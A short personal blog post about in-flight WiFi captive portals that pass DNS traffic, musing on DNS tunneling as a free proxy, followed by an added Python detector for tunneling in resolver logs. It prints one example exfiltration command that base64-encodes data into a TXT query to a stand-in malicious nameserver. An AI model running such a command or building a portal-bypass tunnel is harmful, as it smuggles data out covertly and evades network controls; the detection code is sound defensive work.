Using DNS to bypass hotspot WiFi
──────────────────────────────────────────────────────────────────────

I took the plane yesterday, and realized that some companies now
« offer » a free wifi service on-board, so you can access the internet
while flying. They don't really offer anything though, as you must
register your email address on a captive portal, and even pay a fee to
get full internet access (instead of just « messaging apps »).

I tried to access the internet using curl(1) directly, to see if you
could use protocols like gopher, or even smtp without registering.
Turns out you can't.
However, I noticed that I could resolve all the hostnames I wanted!
Which means DNS requests reach the internet without you needing to
register on the portal. It immediately reminded me of a technique I had
read about in the past and forgotten: DNS tunneling.

DNS tunneling is usually used as a data exfiltration method in cyber
attacks. It assumes DNS traffic goes to the internet unfiltered, so
malware can use DNS queries to export data to an external server. For
example:

   pl=$(echo "hidden data" | base64)
   dig +short TXT $pl @gimmedata.ns1.malicious.tld

The data can then be retrieved from the logs, or a modified DNS server
could even reconstruct it. This is bad though, and you shouldn't do it.

However, abusing the DNS payload to send data over the internet is an
interesting idea. Instead of exfiltrating data, you could use the
remote DNS server as a proxy or VPN, and access the clearnet by
wrapping all your outgoing traffic in DNS queries that the external
server would replay, with the responses coming back in DNS replies!

It could work in theory, but has two major downsides. First, it would
be horribly slow: the DNS payload is limited to something like 512
bytes, so that means fragmenting your traffic so it fits in a DNS
request. Same for replies.
The second drawback is that it generates a lot of DNS traffic,
potentially marking you as an attacker in the network you're trying to
bypass, which could lead to problems.
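That second drawback is also what makes this traffic visible to the
network operator. As an added example (not part of the original post),
here is a small Python detector run over constructed resolver log
lines; it flags registered domains that receive many distinct,
high-entropy TXT queries, which is the shape the dig one-liner above
produces at volume. The thresholds and the two-label zone cut are
assumptions chosen to suit the sample data.

```python
import math
from collections import defaultdict

# Constructed resolver log lines (client, qtype, qname): sample data, not real records.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA mail.example.org
10.0.0.5 TXT aGlkZGVuIGRhdGEK.t.malicious.tld
10.0.0.5 TXT c2VjcmV0IGZpbGUgcGFydCAx.t.malicious.tld
10.0.0.5 TXT c2VjcmV0IGZpbGUgcGFydCAy.t.malicious.tld
10.0.0.5 TXT bW9yZSBoaWRkZW4gYnl0ZXMgaGVyZQ.t.malicious.tld
10.0.0.9 A cdn.example.com
"""

def shannon_entropy(s):
    """Bits per character; base64-style payloads score far above plain hostnames."""
    n = len(s)
    if n == 0:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_qname(qname):
    """Crude zone cut (assumption): the last two labels are the registered domain,
    no public suffix list; everything to their left is where a tunnel carries data."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), "".join(labels[:-2])

def detect_tunneling(log, min_unique=3, min_entropy=3.0, min_txt_ratio=0.5):
    """Flag registered domains receiving many distinct, high-entropy, TXT-heavy
    queries. Thresholds are assumptions tuned for the constructed sample."""
    stats = defaultdict(lambda: {"qnames": set(), "total": 0, "txt": 0, "entropy": 0.0})
    for line in log.splitlines():
        _client, qtype, qname = line.split()
        domain, payload = split_qname(qname)
        d = stats[domain]
        d["qnames"].add(qname)
        d["total"] += 1
        d["txt"] += 1 if qtype == "TXT" else 0
        d["entropy"] += shannon_entropy(payload)
    flagged = {}
    for domain, d in stats.items():
        uniq, avg_entropy = len(d["qnames"]), d["entropy"] / d["total"]
        txt_ratio = d["txt"] / d["total"]
        if uniq >= min_unique and avg_entropy >= min_entropy and txt_ratio >= min_txt_ratio:
            flagged[domain] = {"unique_qnames": uniq, "txt_ratio": txt_ratio,
                               "avg_payload_entropy": round(avg_entropy, 2)}
    return flagged
```

On the sample, detect_tunneling(SAMPLE_LOG) reports only malicious.tld;
the example.com and example.org lookups stay below every threshold.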

I thought it was a fun idea to explore, and I wonder if such a proxying
method has been tested already?

Having such a DNS web proxy in your toolbox could be pretty helpful
from time to time!
--
~wgs
20200926.1342